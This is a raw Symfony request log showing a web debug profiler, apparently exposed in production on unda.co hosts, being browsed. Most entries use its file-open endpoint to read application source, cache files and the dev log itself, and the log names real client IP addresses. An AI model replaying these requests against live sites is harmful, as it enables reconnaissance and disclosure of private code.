[2025-12-21 06:39:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-21 06:39:49] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-21 06:40:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=time","method":"GET"} []
[2025-12-21 06:40:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-21 06:40:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=config","method":"GET"} []
[2025-12-21 06:40:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-21 06:40:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=twig","method":"GET"} []
[2025-12-21 06:40:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-21 06:40:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=dump","method":"GET"} []
[2025-12-21 06:40:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-21 06:41:08] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"7061e0","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/7061e0/search/results?ip=112.86.225.168","method":"GET"} []
[2025-12-21 06:41:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=112.86.225.168","method":"GET"} []
[2025-12-21 06:41:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=request","method":"GET"} []
[2025-12-21 06:41:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-21 06:41:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest?ip=216.73.216.212","method":"GET"} []
[2025-12-21 06:41:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=216.73.216.212","method":"GET"} []
[2025-12-21 06:41:09] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FComponent%2FHttpKernel%2FHttpKernel.php&line=68","method":"GET"} []
[2025-12-21 06:41:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4b64dc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4b64dc","method":"GET"} []
[2025-12-21 06:41:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 06:41:20] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2Fexception.css.twig&line=1","method":"GET"} []
[2025-12-21 06:41:20] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FComponent%2FEventDispatcher%2FEventDispatcher.php&line=214","method":"GET"} []
[2025-12-21 06:41:20] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FComponent%2FRouting%2FMatcher%2FUrlMatcher.php&line=93","method":"GET"} []
[2025-12-21 06:41:21] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FComponent%2FEventDispatcher%2FEventDispatcher.php&line=44","method":"GET"} []
[2025-12-21 06:41:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2882d9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2882d9?panel=db","method":"GET"} []
[2025-12-21 06:41:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-21 06:42:07] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2Flayout.html.twig&line=1","method":"GET"} []
[2025-12-21 06:42:07] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FComponent%2FSecurity%2FCore%2FAuthorization%2FVoter%2FExpressionVoter.php&line=27","method":"GET"} []
[2025-12-21 06:42:07] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2FException%2Fexception.html.twig&line=1","method":"GET"} []
[2025-12-21 06:42:08] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FComponent%2FEventDispatcher%2FDebug%2FTraceableEventDispatcher.php&line=143","method":"GET"} []
[2025-12-21 06:42:36] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2Fimages%2Ficon-support.svg&line=1","method":"GET"} []
[2025-12-21 06:42:36] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2Fimages%2Fsymfony-logo.svg&line=1","method":"GET"} []
[2025-12-21 06:42:37] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2FException%2Flogs.html.twig&line=1","method":"GET"} []
[2025-12-21 06:42:37] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=src%2FHona%2FWebBundle%2FController%2FDefaultController.php&line=14","method":"GET"} []
[2025-12-21 06:42:43] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2Fimages%2Ficon-plus-square.svg&line=1","method":"GET"} []
[2025-12-21 06:42:43] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2FException%2Ftraces.txt.twig&line=1","method":"GET"} []
[2025-12-21 06:42:43] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2Fimages%2Ficon-plus-square-o.svg&line=1","method":"GET"} []
[2025-12-21 06:42:44] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2FException%2Ftrace.txt.twig&line=1","method":"GET"} []
[2025-12-21 06:42:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/latest?ip=52.167.144.177&limit=10","method":"GET"} []
[2025-12-21 06:42:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=52.167.144.177&limit=10","method":"GET"} []
[2025-12-21 06:43:40] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2Fimages%2Ficon-minus-square-o.svg&line=1","method":"GET"} []
[2025-12-21 06:43:40] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2Fimages%2Fchevron-right.svg&line=1","method":"GET"} []
[2025-12-21 06:43:40] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=var%2Fcache%2Fdev%2FappDevDebugProjectContainerUrlMatcher.php&line=2103","method":"GET"} []
[2025-12-21 06:43:41] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle%2FResources%2Fviews%2Fimages%2Ficon-book.svg&line=1","method":"GET"} []
[2025-12-21 06:43:55] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=var%2Flogs%2Fdev.log&line=0","method":"GET"} []